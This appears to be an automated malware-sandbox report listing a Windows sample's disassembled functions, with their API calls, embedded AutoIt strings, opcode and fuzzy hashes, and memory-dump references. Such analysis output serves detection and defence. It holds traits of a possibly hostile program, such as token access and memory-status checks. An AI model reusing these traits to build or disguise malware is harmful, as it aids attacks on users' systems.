                                                • API String ID: 1946975507-0
                                                • Opcode ID: aa4695de619e693a99d96e6e39ee4a6ebf007f4bbb80115283a08023a7a16bb6
                                                • Instruction ID: ef0494af85622dc10e4652a50a14fd4ed2d3674822ce7d84f7f7adb6bfb4d38f
                                                • Opcode Fuzzy Hash: aa4695de619e693a99d96e6e39ee4a6ebf007f4bbb80115283a08023a7a16bb6
                                                • Instruction Fuzzy Hash: 56E03932100248EAEF215F64EC0D7E83B10EF46332F04C366FA69880E28B7A4990DB15
                                                Function 007C8A3A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentThread.KERNEL32 ref: 007C8A43
                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,007C860E), ref: 007C8A4A
                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007C860E), ref: 007C8A57
                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,007C860E), ref: 007C8A5E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CurrentOpenProcessThreadToken
                                                • String ID:
                                                • API String ID: 3974789173-0
                                                • Opcode ID: 739649b7a2b1825e31d2a9733cf725f4255ded958e528a09d03d523febf93cbd
                                                • Instruction ID: fd28b0b4b87a99e2645a5183391135b3b38835a29710709dabf35dec574e4e5b
                                                • Opcode Fuzzy Hash: 739649b7a2b1825e31d2a9733cf725f4255ded958e528a09d03d523febf93cbd
                                                • Instruction Fuzzy Hash: 02E04F36641211DFD7605FB06D0CF6A3BA8AF50792F04C83CE245C9040DE289441D755
                                                Function 007B20B6 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 007B20B6
                                                • GetDC.USER32(00000000), ref: 007B20C0
                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007B20E0
                                                • ReleaseDC.USER32(?), ref: 007B2101
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: 5c28a0219924d927a9134707d6d8879dcfcaa144c9560e05b314070f72b44853
                                                • Instruction ID: 05f050caecf36de4e8c205ea4ef877e4cac8a3ab7224099d9f5d26d00d1f2711
                                                • Opcode Fuzzy Hash: 5c28a0219924d927a9134707d6d8879dcfcaa144c9560e05b314070f72b44853
                                                • Instruction Fuzzy Hash: 35E0C275801204EFCF01AF6088486AD7BB1AF4C350F11C029E95AE6221CF3C8141DF45
                                                Function 007B20CA Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 007B20CA
                                                • GetDC.USER32(00000000), ref: 007B20D4
                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007B20E0
                                                • ReleaseDC.USER32(?), ref: 007B2101
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: b44438fe350d788be41ef41eabc52fa696d460aab9084a39d960900bf2429d79
                                                • Instruction ID: efa18b5accc5356f4f4e74896b2d6a89d781c543c5b8ed1eb67d0e7371668f00
                                                • Opcode Fuzzy Hash: b44438fe350d788be41ef41eabc52fa696d460aab9084a39d960900bf2429d79
                                                • Instruction Fuzzy Hash: 5BE0CAB5800204AFCF01AFA088486AD7BA1AF4C350B11C029E95AE6220CF3C9141DF48
                                                Function 007CB5B5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleSetContainedObject.OLE32(?,00000001), ref: 007CB780
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ContainedObject
                                                • String ID: AutoIt3GUI$Container
                                                • API String ID: 3565006973-3941886329
                                                • Opcode ID: e18da8363c630034850b6565835b31e0ac6e6522c4dd4437a091d91b187d8a83
                                                • Instruction ID: e095e2c5425e8257cb052f80db9918a7978f55f1c8b13c273316f56e5bbfdbc7
                                                • Opcode Fuzzy Hash: e18da8363c630034850b6565835b31e0ac6e6522c4dd4437a091d91b187d8a83
                                                • Instruction Fuzzy Hash: 33913670600601AFDB54DF68C885F6ABBE9FF48710F14856EF94ADB691DBB4E840CB90
                                                Function 007DB038 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0078FE06: _wcscpy.LIBCMT ref: 0078FE29
                                                  • Part of subcall function 00779997: __itow.LIBCMT ref: 007799C2
                                                  • Part of subcall function 00779997: __swprintf.LIBCMT ref: 00779A0C
                                                • __wcsnicmp.LIBCMT ref: 007DB0B9
                                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 007DB182
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                • String ID: LPT
                                                • API String ID: 3222508074-1350329615
                                                • Opcode ID: e596573993f2a5dd1140cbbef34d5857779f9fe27c2196bb1f8ed5170488e146
                                                • Instruction ID: 77233a16f53d7857c820bad55d20079fe163cdadefad8c6caad820ff8cc2ebdb
                                                • Opcode Fuzzy Hash: e596573993f2a5dd1140cbbef34d5857779f9fe27c2196bb1f8ed5170488e146
                                                • Instruction Fuzzy Hash: E0615276A00219EFCB14DF94C895EAEB7B4EF48310F15805AF656AB351DB78AE40CB90
                                                Function 007B88DA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: Oax
                                                • API String ID: 4104443479-2797580295
                                                • Opcode ID: 5610e92988c8d154027db86d3ea04e669162947e35be828fff2951c1ea1fec8e
                                                • Instruction ID: 019cf9f624e1f55c673c2b07b4acd43b2ba8f96b902c14ba0581eebf86106e25
                                                • Opcode Fuzzy Hash: 5610e92988c8d154027db86d3ea04e669162947e35be828fff2951c1ea1fec8e
                                                • Instruction Fuzzy Hash: 50514DB0A00609DFDF64DF68D880AEEBBF5FF44304F14852AE85AD7240EB35A955CB52
                                                Function 00782AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNEL32(00000000), ref: 00782AC8
                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 00782AE1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: GlobalMemorySleepStatus
                                                • String ID: @
                                                • API String ID: 2783356886-2766056989
                                                • Opcode ID: 7d38e34a7f59d7f56a4cd3ec0828fd7674bcd4a5b55cbdb385da511a85a2c12d
                                                • Instruction ID: 7adb52bf6b0869030d7d93657c0a0a82aa2aaa0b3a5f4839347409432f575981
                                                • Opcode Fuzzy Hash: 7d38e34a7f59d7f56a4cd3ec0828fd7674bcd4a5b55cbdb385da511a85a2c12d
                                                • Instruction Fuzzy Hash: F8516672419744DBD720AF10D88ABAFBBF8FF85350F42885CF2D9511A1DB348529CB66
                                                Function 007D97DD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0077506B: __fread_nolock.LIBCMT ref: 00775089
                                                • _wcscmp.LIBCMT ref: 007D98CD
                                                • _wcscmp.LIBCMT ref: 007D98E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _wcscmp$__fread_nolock
                                                • String ID: FILE
                                                • API String ID: 4029003684-3121273764
                                                • Opcode ID: 1f9631f61c6f059d8e880fc00f6b07f04d075b987539a52914df12ec3cc38772
                                                • Instruction ID: 36ed86ed8b894d0355e28f03478376ebbfc43e017a28e3592f8ebc80f4835174
                                                • Opcode Fuzzy Hash: 1f9631f61c6f059d8e880fc00f6b07f04d075b987539a52914df12ec3cc38772
                                                • Instruction Fuzzy Hash: 2F41D971A00619FADF219FA0CC49FEF77BDDF45714F00446ABA04A7281DA79AD05C7A1
                                                Function 007E26A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 007E26B4
                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007E26EA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CrackInternet_memset
                                                • String ID: |
                                                • API String ID: 1413715105-2343686810
                                                • Opcode ID: 6f853e4bc09f88d9b9d2cc29ff1b43b4d071971054318e4791799ec22a79c79f
                                                • Instruction ID: e1466e7ea8d372e05fa62f83428f45a2c2d09f400e01e907d5f5f23536661d53
                                                • Opcode Fuzzy Hash: 6f853e4bc09f88d9b9d2cc29ff1b43b4d071971054318e4791799ec22a79c79f
                                                • Instruction Fuzzy Hash: 26313971801109EFCF05EFA1CC89EEEBFB9FF08350F104069F909A6166EA355A56DB60
                                                Function 007F7AA3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 007F7B93
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007F7BA8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: '
                                                • API String ID: 3850602802-1997036262
                                                • Opcode ID: ff54c65f0d79628802feea879caccfaabee328a7e5e1c78648ed616273d0ffbf
                                                • Instruction ID: d92c69e423ca99e6dd66e6117307b209f13013fdb4ac08f9ca24e172b922efba
                                                • Opcode Fuzzy Hash: ff54c65f0d79628802feea879caccfaabee328a7e5e1c78648ed616273d0ffbf
                                                • Instruction Fuzzy Hash: DA4107B4A05209DFDB14CF69C881BEABBB5FF09300F10456AEA04EB391D774A951CF90
                                                Function 007F6A95 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                Download Yara Rule
                                                APIs
                                                • DestroyWindow.USER32(?,?,?,?), ref: 007F6B49
                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007F6B85
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$DestroyMove
                                                • String ID: static
                                                • API String ID: 2139405536-2160076837
                                                • Opcode ID: 954aced3cbcf0ed0f4c53cbdfc2940a8389c68cd386f86aa85f3dbcb72e41d6d
                                                • Instruction ID: dcfc7dd7fb6a86a345e14d8d6c5673937c0205e749b7f2556419b0be630f5ddd
                                                • Opcode Fuzzy Hash: 954aced3cbcf0ed0f4c53cbdfc2940a8389c68cd386f86aa85f3dbcb72e41d6d
                                                • Instruction Fuzzy Hash: 4A316F71100608AADB109F64CC85AFB77A9FF88760F10C519FA99D7290DB39AC41D760
                                                Function 007D2B9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 007D2C09
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007D2C44
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: InfoItemMenu_memset
                                                • String ID: 0
                                                • API String ID: 2223754486-4108050209
                                                • Opcode ID: 339f5467ef82eb19048d3631e7f2f2ef7398a6596a40947384cb9aa327597b7c
                                                • Instruction ID: 18a650627379ef9b95ac8f1d34c12256fbef1d195f464fd0138557f1b9be5408
                                                • Opcode Fuzzy Hash: 339f5467ef82eb19048d3631e7f2f2ef7398a6596a40947384cb9aa327597b7c
                                                • Instruction Fuzzy Hash: 4031E831610205DFDB349F44D8857AEBBB5FF15350F24401AE889972A2E7789E43CB60
                                                Function 007E3AFF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                Download Yara Rule
                                                APIs
                                                • __snwprintf.LIBCMT ref: 007E3B7C
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __snwprintf_memmove
                                                • String ID: , $$AUTOITCALLVARIABLE%d
                                                • API String ID: 3506404897-2584243854
                                                • Opcode ID: 3d20e11bedbc8d9b2605e182f22ecd06f374f5ed547454857f690cc516366895
                                                • Instruction ID: e2085d7a8eed1a11990f226b7c3c542a12c3a373b61fbd6626b17ec3a4b382d6
                                                • Opcode Fuzzy Hash: 3d20e11bedbc8d9b2605e182f22ecd06f374f5ed547454857f690cc516366895
                                                • Instruction Fuzzy Hash: EE219570601118EBCF14EF64DC8AEAD77A4FF49700F508498F519A7281DB78EA55CBA1
                                                Function 007F6706 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007F6793
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F679E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: Combobox
                                                • API String ID: 3850602802-2096851135
                                                • Opcode ID: 698e42852813828292da6062e6312c079e088d4d5d21454a6dc461d0d16809d8
                                                • Instruction ID: 6fa3ee7baab75093a6ea7e30516984dc6f06afa5bbd941b411704c71de688acd
                                                • Opcode Fuzzy Hash: 698e42852813828292da6062e6312c079e088d4d5d21454a6dc461d0d16809d8
                                                • Instruction Fuzzy Hash: 0111827530020DAFEF21AF24DC85EBB376AEB983A8F104125FA1897390D6399C5197B0
                                                Function 007F6C39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00771D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00771D73
                                                  • Part of subcall function 00771D35: GetStockObject.GDI32(00000011), ref: 00771D87
                                                  • Part of subcall function 00771D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00771D91
                                                • GetWindowRect.USER32(00000000,?), ref: 007F6CA3
                                                • GetSysColor.USER32(00000012), ref: 007F6CBD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                • String ID: static
                                                • API String ID: 1983116058-2160076837
                                                • Opcode ID: 5b9ad48d22d536fcb7114c8c6ee70a2ca48183a654a18a2421235a94a450c9b3
                                                • Instruction ID: 16d39002422e9710219c875af945fb8e46076d1742d6ec47102605b5b4718655
                                                • Opcode Fuzzy Hash: 5b9ad48d22d536fcb7114c8c6ee70a2ca48183a654a18a2421235a94a450c9b3
                                                • Instruction Fuzzy Hash: 0221FC72510209AFDF14DFA8DC45AFA7BB8FB08314F044529FA95D3251EA39E851DB60
                                                Function 007F6952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowTextLengthW.USER32(00000000), ref: 007F69D4
                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007F69E3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: LengthMessageSendTextWindow
                                                • String ID: edit
                                                • API String ID: 2978978980-2167791130
                                                • Opcode ID: c43f09d1ff8ba42666c250caa52250d2705df6940096544d63c6a10cb9886191
                                                • Instruction ID: 7bc78250ead7caf276d3717d9f287cee98ab2434e4544baea4e286cb6d66a052
                                                • Opcode Fuzzy Hash: c43f09d1ff8ba42666c250caa52250d2705df6940096544d63c6a10cb9886191
                                                • Instruction Fuzzy Hash: 7E114F71511108ABEF108F74DC44AFB3B69EF45364F508728FAA5972D0CBB9EC519B60
                                                Function 007D2CA7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 007D2D1A
                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007D2D39
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: InfoItemMenu_memset
                                                • String ID: 0
                                                • API String ID: 2223754486-4108050209
                                                • Opcode ID: cce9bbc8afd8c45d823e2aa3df93b96b9bebf3fac8568ff683512293d182bb3b
                                                • Instruction ID: 85130e8ab5cd5dab39fcce491d9cad65d54f0511378fdc630fcf2d04cf19ed08
                                                • Opcode Fuzzy Hash: cce9bbc8afd8c45d823e2aa3df93b96b9bebf3fac8568ff683512293d182bb3b
